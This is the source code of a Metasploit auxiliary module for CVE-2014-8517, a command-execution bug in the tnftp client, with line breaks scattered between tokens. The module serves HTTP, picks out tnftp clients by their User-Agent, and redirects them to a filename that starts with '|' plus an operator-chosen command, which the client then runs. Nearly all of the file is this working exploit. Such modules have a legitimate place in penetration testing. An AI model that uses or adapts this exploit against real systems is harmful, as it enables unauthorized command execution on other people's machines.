##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
class
Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
include Msf::Auxiliary::Report
def
initialize(info = {})
super
(update_info(info,
'Name'
=>
'tnftp "savefile" Arbitrary Command Execution'
,
'Description'
=> %q{
This
module
exploits an arbitrary command execution vulnerability
in
tnftp's handling of the resolved output filename - called
"savefile"
in
the source - from a requested resource.
If tnftp is executed without the -o command-line option, it will resolve
the output filename from the last component of the requested resource.
If the output filename begins with a
"|"
character, tnftp will pass the
fetched resource's output to the command directly following the
"|"
character through the use of the popen() function.
},
'Author'
=> [
'Jared McNeill'
,
# Vulnerability discovery
'wvu'
# Metasploit module
],
'References'
=> [
[
'CVE'
,
'2014-8517'
],
],
'DisclosureDate'
=>
'Oct 28 2014'
,
'License'
=>
MSF_LICENSE
,
'Actions'
=> [
[
'Service'
]
],
'PassiveActions'
=> [
'Service'
],
'DefaultAction'
=>
'Service'
))
register_options([
OptString.
new
(
'CMD'
, [
true
,
'Command to run'
,
'uname -a'
])
])
end
def
run
exploit
end
def
on_request_uri(cli, request)
unless
request[
'User-Agent'
] =~ /(tn|NetBSD-)ftp/
print_status(
"#{request['User-Agent']} connected"
)
send_not_found(cli)
return
end
if
request.uri.ends_with?(sploit)
send_response(cli,
''
)
print_good(
"Executing `#{datastore['CMD']}'!"
)
report_vuln(
:host
=> cli.peerhost,
:name
=>
self
.name,
:refs
=>
self
.references,
:info
=> request[
'User-Agent'
]
)
else
print_status(
"#{request['User-Agent']} connected"
)
print_status(
'Redirecting to exploit...'
)
send_redirect(cli, sploit_uri)
end
end
def
sploit_uri
(get_uri.ends_with?(
'/'
) ? get_uri :
"#{get_uri}/"
) +
Rex::Text.uri_encode(sploit,
'hex-all'
)
end
def
sploit
"|#{datastore['CMD']}"
end
end